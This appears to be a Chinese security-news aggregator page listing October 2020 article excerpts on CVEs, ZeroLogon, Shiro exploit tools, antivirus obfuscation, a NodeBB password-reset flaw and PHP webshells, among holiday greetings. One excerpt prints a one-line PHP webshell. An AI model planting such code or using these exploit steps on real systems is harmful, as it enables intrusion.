记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

神奇的异字符:"\u0e"

收录于话题 前言1:将反诈骗进行到底,百度搜索关键字:郭盛华是骗子,为反诈尽绵薄之力。前言2:近日发现微信有卡死的聊天记录,国庆闲着无聊就研究了一波,发现一个有意思的情况就发文水一篇。1.微信卡死  前一段时间有发现一些群聊里有很多人发一段聊天记录,只要点开就会导致微信崩溃的情况。感觉原理是个很有意思,于是乎我就研究了一波。
发布时间:2020-10-01 21:25 | 阅读:633 | 评论:0 | 标签:无

Microsoft Exchange服务器仍然打开以积极利用漏洞

收录于话题 尽管微软几乎在八个月前发布了补丁,但61%的Exchange服务器仍然易受攻击。超过一半的公开Exchange服务器仍然容易受到严重漏洞的攻击,该漏洞允许经过身份验证的攻击者以系统权限远程执行代码--甚至在Microsoft发布修补程序8个月后。所涉漏洞(CVE-2020-0688)存在于Exchange的控制面板、Microsoft的邮件服务器和日历服务器中。该漏洞源于服务器未能在安装时正确创建唯一密钥,该漏洞是Microsoft的二月补丁星期二更新-和三月份的管理员被警告了未修补的服务器在野外被未命名的高级持久性威胁(APT)参与者利用。
发布时间:2020-10-01 21:25 | 阅读:670 | 评论:0 | 标签:漏洞 安全

.NET自动化混淆工具

收录于话题 #内网渗透技巧 1 #外网渗透技巧 1 #杀软对抗 1 #Weapon 1 #漏洞挖掘 1 推一个混淆工具,只支持.NET测试对象:Watson以360为例混淆后:杀软一般就是静
发布时间:2020-10-01 21:25 | 阅读:674 | 评论:0 | 标签:自动化 自动

飓风安全团队祝您国庆!中秋双节快乐

收录于话题 飓风安全将继续火力再开,守护更多用户的安全;
发布时间:2020-10-01 18:51 | 阅读:1658 | 评论:0 | 标签:安全

每日一题之 高并发系统

收录于话题 点击上方 Java后端,选择 设为星标优质文章,及时送达高并发系统的设计与实现在开发高并发系统时有三把利器用来保护系统:缓存、降级和限流。缓存:缓存比较好理解,在大型高并发系统中,如果没有缓存数据库将分分钟被爆,系统也会瞬间瘫痪。使用缓存不单单能够提升系统访问速度、提高并发访问量,也是保护数据库、保护系统的有效方式。大型网站一般主要是“读”,缓存的使用很容易被想到。在大型“写”系统中,缓存也常常扮演者非常重要的角色。比如累积一些数据批量写入,内存里面的缓存队列(生产消费),以及HBase写数据的机制等等也都是通过缓存提升系统的吞吐量或者实现系统的保护措施。
发布时间:2020-10-01 18:51 | 阅读:1614 | 评论:0 | 标签:无

GitHub:再见,master!

收录于话题 点击上方 Java后端,选择 设为星标优质项目,及时送达来源:CSDNGitHub宣布,自2020年10月1日起,在GitHub平台上创建的所有源代码存储库都将默认命名为 main ,而非原本的 master 。近日,GitHub宣布,自2020年10月1日起,在GitHub平台上创建的所有源代码存储库都将默认命名为 main ,而非原本的 master 。这一变化是什么原因?具体又是怎样的变化呢?接下来为你一一解答。
发布时间:2020-10-01 18:51 | 阅读:1243 | 评论:0 | 标签:无

国庆中秋不停歇,腾讯安全一直在线

收录于话题 中秋遇上了国庆与国同庆,与家同在此刻您是否已经开启了假期模式享受着惬意的假期 但请注意!网络风险可不会放假越是节假日网络
发布时间:2020-10-01 18:51 | 阅读:1498 | 评论:0 | 标签:安全

迎中秋 · 庆国庆

收录于话题 月亮越来越圆好事也会越来越近啊~专注渗透测试技术全球最新网络攻击技术END
发布时间:2020-10-01 18:51 | 阅读:1537 | 评论:0 | 标签:无

GoCN携双节惊喜特惠祝各位土拨鼠们佳节快乐~

收录于话题 祝大家花好月圆人团圆!点击阅读原文,Robert Griesemer、Russ Cox、许式伟、左耳朵耗子、Richard Hartmann、Vladimir Vivien、毛剑等大咖都在 GopherChina
发布时间:2020-10-01 18:51 | 阅读:1483 | 评论:0 | 标签:无

白帽黑客与网络安全工程师教你:使用Metasploit进行FTP服务扫描

课前声明:1、本分享仅做学习交流,请自觉遵守法律法规!2、搜索:Kali与编程,学习更多网络攻防干货!3、Kali与编程每天准时更新,敬请学习和关注!3.1 在受害者Win2008 Server虚拟机配置防火墙(关闭防火墙),如下图所示。命令:Win+R/cmd/firewall.cpl3.2 在攻击方主机(Kali Linux主机)代开Postgresql数据库,如下图所示。命令:service postgresql start3.3 在攻击方Kali Linux主机打开Metasploit(msf)渗透框架,如下图所示。
发布时间:2020-10-01 13:46 | 阅读:3187 | 评论:0 | 标签:渗透测试 扫描 黑客 白帽 网络安全 安全

波场链西红柿盗币案揭秘:黑客如何利用curve、Uniswap洗钱

2020年9月25日,社交媒体传出,有用户被tomatos.finance盗取1万DAI。该骗局的主要方式是以空投诱导用户approve给权限,然后直接转走代币。空投是骗局,暂未收到代币。tomatos.fi是孙流动性挖矿项目,疑似是来自某中国团队。经与多家安全公司核实,截止发稿前,有多名用户被tomatos.finance盗取稳定币,遭遇巨额损失。吴说区块链采访了其中一个遭遇tomatos.finance黑客盗币的用户(简称A用户),对整个事件进行回顾:A用户于事发前几天登录tomatos. Finance授权使用imtoken钱包。
发布时间:2020-10-01 13:46 | 阅读:3466 | 评论:0 | 标签:安全报 黑客

涉嫌盗取近1.17亿用户密码,一俄公民被加州法院判处88个月监禁

俄罗斯卫星通讯社9月30日消息,美国加利福尼亚北区联邦地区法院以网络犯罪相关罪名判处俄罗斯国民阿列克谢·尼库林(Alexei Nikulin)88个月监禁。据报道,检察官要求判处其近12年监禁。尼库林于2016年10月5日在布拉格被捕。美国联邦调查局怀疑他入侵领英、Dropbox和Formspring等网站,盗取近1.17亿用户的登录名和密码,并试图在网上出售。加州北区法院法官威廉·阿尔苏普(William Alsup)表示:“尼库林将数百万人的身份置于危险中。
发布时间:2020-10-01 13:46 | 阅读:2894 | 评论:0 | 标签:安全报

祝各位大佬双节快乐!

收录于话题 F11Team祝各位大佬双节快乐!73365045 这个特殊的数字~细细品~
发布时间:2020-10-01 13:43 | 阅读:3140 | 评论:0 | 标签:无

Glupteba变种:跨平台、模块化恶意软件分析

研究人员近期发现一个Glupteba的变种。Glupteba是Operation Windigo 攻击活动中使用的木马,研究人员之前报告过其针对MikroTik 路由器的攻击以及C2 服务器的更新。该变种的行为与其他Glupteba 变种有相似之处。此外,该变种还使用了模块化的广告恶意软件ManageX。图 1. 攻击链使用Go 语言在解压了攻击中使用的主释放器后,研究人员发现该恶意软件变种是用Go 语言开发的。Go 语言只有10 年的历史,而且用它来开发恶意软件是比较少见的。恶意软件开发人员选择Go 语言的原因可能是该语言的特征使得开发的恶意软件可以在进入受害者系统时不被发现。
发布时间:2020-10-01 11:52 | 阅读:3551 | 评论:0 | 标签:无

ZeroLogon(CVE-2020-1472) 漏洞的攻击与防御策略(上)

本文将从攻防角度对CVE-2020-1472进行一个简单的介绍,并对如何检测和修复ZeroLogon提出具体建议。什么是ZeroLogon?Netlogon远程协议(也称为MS-NRPC)是一个远程进程调用(RPC)接口,仅由连接到域的设备使用。 MS-NRPC包括身份验证方法和建立Netlogon安全通道的方法。这些更新强制指定的Netlogon客户端行为,以便在成员计算机和Active Directory (AD)域控制器(DC)之间使用带有Netlogon安全通道的安全RPC。
发布时间:2020-10-01 11:52 | 阅读:3703 | 评论:0 | 标签:漏洞 防御 攻击 CVE

2020HW中通达OA多个漏洞复现总结

收录于话题 #通达OA 1 #HW演练 2 此文为作者投稿,原创作者:calmness,曾就职于某大型互联网安全公司,喜欢研究渗透测试,溯源,CTF;在FreeBuf上发表过许多优秀文章,CSDN 博客地址:https://blog.csdn.net/weixin_43650289;还在弥天安全实验室,炎黄安全等公众号上发表过相关的安全文章。目录描述2020HW中涉及到的点影响版本准备环境漏洞利用过程描述未经授权的攻击者可以通过构造进行任意用户登录(包括admin),登录之后可进一步上传恶意文件控制网站服务器。
发布时间:2020-10-01 11:10 | 阅读:3870 | 评论:0 | 标签:漏洞

安天祝您国庆中秋双节快乐!

收录于话题 安天祝您国庆中秋双节快乐!
发布时间:2020-10-01 11:10 | 阅读:3798 | 评论:0 | 标签:无

金秋十月 喜迎双节

收录于话题 心中有家,温情绵长;心中有国,情深意重。双节同庆,家国同心。君信安团队恭祝大家双节快乐!
发布时间:2020-10-01 11:10 | 阅读:3446 | 评论:0 | 标签:无

从Wireshark到数据分析

收录于话题 0x00写在前面    工欲善其事必先利其器!熟悉掌握一种神器对以后的工作必然是有帮助的,下面我将从简单的描述Wireshark的使用和自己思考去写,若有错误或不足还请批评指正。0x01Wireshark介绍   Wireshark(前称Ethereal)是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。在过去,网络封包分析软件是非常昂贵的,或是专门属于盈利用的软件。Ethereal的出现改变了这一切。
发布时间:2020-10-01 11:10 | 阅读:3633 | 评论:0 | 标签:无

充值漏洞之先充两个亿

收录于话题                     这是 None_Sec 的第 7 篇文章。                     全文共计302个字,预计阅读时长0分钟。
发布时间:2020-10-01 11:10 | 阅读:4225 | 评论:0 | 标签:漏洞

【文末赠书】工控安全之Modbus协议实现和安全性分析(上)

收录于话题 概述 Modbus 最初是由 Modicon 于 1979 年发布的用于 PLC 设备之间的通讯协议,后被 Schneider Electric 收购并与 2004 年将 Modbus 交于 Modbus Organization 管理和维护,Modbus 在工业界很受欢迎,因为它不仅公开而且免税,如今 Modbus 已经成为行业的标准通信协议,是连接工业电子设备的常用手段。Modbus 是一个应用层协议,位于 OSI 模型的第七层。它为建立在不同总线或网络类型的设备之间提供一种基于 Client/Server 的通讯方式( 也称为 Master/Slave )。
发布时间:2020-10-01 11:10 | 阅读:3394 | 评论:0 | 标签:工控 安全

Shiro漏洞一键检测利用工具(EXP)

支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持简单回显。使用说明第一步:按要求输入要检测的目标URL和选择漏洞类型Shiro550
发布时间:2020-10-01 10:59 | 阅读:3685 | 评论:0 | 标签:exp 漏洞

2020HW系列文章整理分享

极度安全祝大家:国庆快乐!中秋快乐!HW结束后,大家有没有感觉很忙、更忙了。在hw那段时间,虽然是997的排班,但是其余项目都暂停,只是专心做一件事。hw结束后,并发量都来了。拖延的项目,都是欠下的债。
发布时间:2020-10-01 10:59 | 阅读:3445 | 评论:0 | 标签:无

多线程漏洞扫描程序

软件介绍多线程漏洞扫描程序可用于大规模检测低挂起(low-hanging)的漏洞。安装条件Python> = 3.6安装python库$ python3 -m pip install -r requirements.txt在Windows和Linux上均可使用,但是Windows不是主要平台。
发布时间:2020-10-01 10:59 | 阅读:4000 | 评论:0 | 标签:扫描 漏洞

HettyHTTP开源黑客工具包(BurpSuite未来替代品)

介绍Hetty是用于安全性研究的HTTP工具包。它旨在成为Burp Suite Pro等商业软件的开源替代品,并具有针对信息安全和漏洞赏金社区需求而定制的强大功能。功能HTTP中间人(MITM)代理和GraphQL服务器。具有代理日志查看器的Web界面(Next.js)。将范围支持添加到代理。在代理日志查看器中进行全文搜索(使用正则表达式)。项目管理。发送器模块,用于从头开始或基于代理日志中的请求发送手动HTTP请求。攻击者模块,用于自动发送HTTP请求。利用Go及其net/http包的并发功能,可以使其快速发展。安装Hetty在GitHub上作为一个二进制文件打包,并嵌入了Web界面资源。
发布时间:2020-10-01 10:59 | 阅读:3733 | 评论:0 | 标签:黑客

NodeBB论坛越权漏洞(任意密码重置漏洞)

在对NodeBB论坛软件进行测试时,我发现可以更改每个用户帐户的密码。现在,我将告诉您利用此漏洞的步骤。首先,确定“ admin”用户的uid:https://www.secvery.com/uid/*我在标有星号(*)的地方尝试了数字,发现admin帐户的uid值为1。https://www.secvery.com/uid/1- > https://www.secvery.com/user/admin我为自己创建了一个名为“ testuser1”的用户。我从用户个人资料转到密码更改页面,在第一个框中输入当前密码,然后在第二个和第三个框中输入要更改的密码。
发布时间:2020-10-01 10:59 | 阅读:3843 | 评论:0 | 标签:漏洞

个人隐私保护:数据匿名也有漏洞

因一场不可思议的隐私泄露,Netflix曾被一位同性恋用户起诉。2006年,该公司公布了大约来自50万用户的一亿条租赁记录,其中包括用户的评分和评分日期,并悬赏百万美金,希望吸引工程师通过软件设计来提高其电影推荐系统的精准度。虽然Netflix做出此举前,已经对数据进行了匿名化处理,但是这名“匿名”同性恋用户还是被认出。匿名化也保护不了隐私数据?在数据容易裸奔的科技时代,匿名化刚给大家吃了定心丸,“打脸”来得这么快?事实上,匿名与隐私从理论概念上来讲完美融合,但是从技术及应对方案上来看,融合之路并非想象中那样简单。
发布时间:2020-10-01 10:59 | 阅读:4067 | 评论:0 | 标签:漏洞

黑客常用PHP大马(WebShell)

一、前言本篇为PHP常见类型WebShell。二、简介1.一句话首先,最常见的为一句话木马,最基础的形式为:<?php @eval($_POST['hacker']); ?><?php assert($_REQUEST
发布时间:2020-10-01 10:59 | 阅读:3082 | 评论:0 | 标签:黑客 PHP shell

外卖客户端容器化架构的演进

收录于话题 #Flutter 2 #前端 2 #美团外卖 1 #容器化 1 #架构 1 总第413篇2020年 第37篇好的架构要不断演变,进而去适应业务的发展。美团在移动端上的架构,也经历了组件化、平台化、RN混合化,到现在开始向容器化变迁。容器化架构充分地利用了现在的跨端技术,将动态化的能力最大化地赋予了业务。作为美团最为重要的业务之一,美团外卖移动端的架构演进是怎样的呢?本文将为你揭开背后的思考、技术细节以及实践。
发布时间:2020-10-01 08:36 | 阅读:3857 | 评论:0 | 标签:无

保障医共体业务系统安全,绿盟科技在行动

收录于话题 在医共体的信息化建设过程中,网络安全的建设是不容忽视的组成部分。便捷、开放的网络环境,是医共体信息化建设的基础。在数据传递和共享的过程当中,数据的安全性要切实地得到保障,才能保障医共体信息化业务的正常运行。《县域医共体信息化建设指南》的第七章节也明确提出了医共体网络保障部分的要求,在遵循《网络安全法》和等级保护2.0等法律法规的基础上,从隐私保护、云内安全、终端安全、态势感知、主动防御、数据安全、可信计算七个方面构建信息安全体系;从日常运维管理、安全配置管理、用户安全管理及系统安全运维等方面构建安全运维体系。
发布时间:2020-10-01 08:36 | 阅读:4055 | 评论:0 | 标签:安全

ADS

标签云